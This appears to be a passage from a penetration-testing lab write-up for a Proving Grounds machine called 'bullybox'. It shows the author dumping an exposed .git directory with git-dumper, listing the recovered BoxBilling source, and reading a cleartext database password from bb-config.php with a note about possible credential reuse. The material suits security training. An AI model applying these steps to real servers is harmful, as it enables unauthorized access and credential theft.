Git
A hidden .git directory was discovered on the target web server
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ git-dumper http://bullybox.local/.git ./git
[-] Testing http://bullybox.local/.git/HEAD [200]
[-] Testing http://bullybox.local/.git/ [403]
[...REDACTED...]
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ cd git ; ll
total 676K
4.0K drwxrwxr-x 10 kali kali 4.0K Mar 31 18:41 .
4.0K drwxrwxr-x 7 kali kali 4.0K Mar 31 18:41 .git
500K -rw-rw-r-- 1 kali kali 497K Mar 31 18:41 rb.php
4.0K -rw-rw-r-- 1 kali kali 716 Mar 31 18:41 robots.txt
4.0K -rw-rw-r-- 1 kali kali 825 Mar 31 18:41 index.php
4.0K drwxrwxr-x 19 kali kali 4.0K Mar 31 18:41 bb-vendor
4.0K drwxrwxr-x 6 kali kali 4.0K Mar 31 18:41 bb-themes
32K -rw-rw-r-- 1 kali kali 30K Mar 31 18:41 bb-update.php
4.0K drwxrwxr-x 3 kali kali 4.0K Mar 31 18:41 bb-uploads
4.0K drwxrwxr-x 50 kali kali 4.0K Mar 31 18:41 bb-modules
4.0K drwxrwxr-x 10 kali kali 4.0K Mar 31 18:41 bb-library
12K -rw-rw-r-- 1 kali kali 11K Mar 31 18:41 bb-load.php
4.0K drwxrwxr-x 3 kali kali 4.0K Mar 31 18:41 bb-locale
4.0K -rw-rw-r-- 1 kali kali 2.3K Mar 31 18:41 .htaccess
28K -rw-rw-r-- 1 kali kali 25K Mar 31 18:41 CHANGELOG.md
12K -rw-rw-r-- 1 kali kali 12K Mar 31 18:41 LICENSE
12K -rw-rw-r-- 1 kali kali 9.9K Mar 31 18:41 README.md
4.0K -rw-rw-r-- 1 kali kali 2.9K Mar 31 18:41 bb-config-sample.php
4.0K -rwxrwxr-x 1 kali kali 938 Mar 31 18:41 bb-config.php
4.0K -rw-rw-r-- 1 kali kali 1.1K Mar 31 18:41 bb-cron.php
4.0K drwxrwxr-x 2 kali kali 4.0K Mar 31 18:41 bb-data
12K -rw-rw-r-- 1 kali kali 12K Mar 31 18:41 bb-di.php
4.0K -rw-rw-r-- 1 kali kali 1.8K Mar 31 18:41 bb-ipn.php
4.0K drwxrwxr-x 3 kali kali 4.0K Mar 31 18:40 ..Dumping the git repository
bb-config.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox/git]
└─$ cat bb-config.php
<?php
return array (
'debug' => false,
'salt' => 'b94ff361990c5a8a37486ffe13fabc96',
'url' => 'http://bullybox.local/',
'admin_area_prefix' => '/bb-admin',
'sef_urls' => true,
'timezone' => 'UTC',
'locale' => 'en_US',
'locale_date_format' => '%A, %d %B %G',
'locale_time_format' => ' %T',
'path_data' => '/var/www/bullybox/bb-data',
'path_logs' => '/var/www/bullybox/bb-data/log/application.log',
'log_to_db' => true,
'db' =>
array (
'type' => 'mysql',
'host' => 'localhost',
'name' => 'boxbilling',
'user' => 'admin',
'password' => 'Playing-Unstylish7-Provided',
),
'twig' =>
array (
'debug' => true,
'auto_reload' => true,
'cache' => '/var/www/bullybox/bb-data/cache',
),
'api' =>
array (
'require_referrer_header' => false,
'allowed_ips' =>
array (
),
'rate_span' => 3600,
'rate_limit' => 1000,
),
); The bb-config.php file contains DB credential; admin:Playing-Unstylish7-Provided
This is a DB credential but there might be a credential reuse for the web application
Commits
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox/git]
└─$ git log
commit ccf7c701c4bd22484cbe5d9f8f92511261aadef0 (HEAD -> master)
Author: Yuki <admin@bullybox.local>
Date: Tue Jun 27 04:35:12 2023 +0000
Ready For launchIt only has a single commit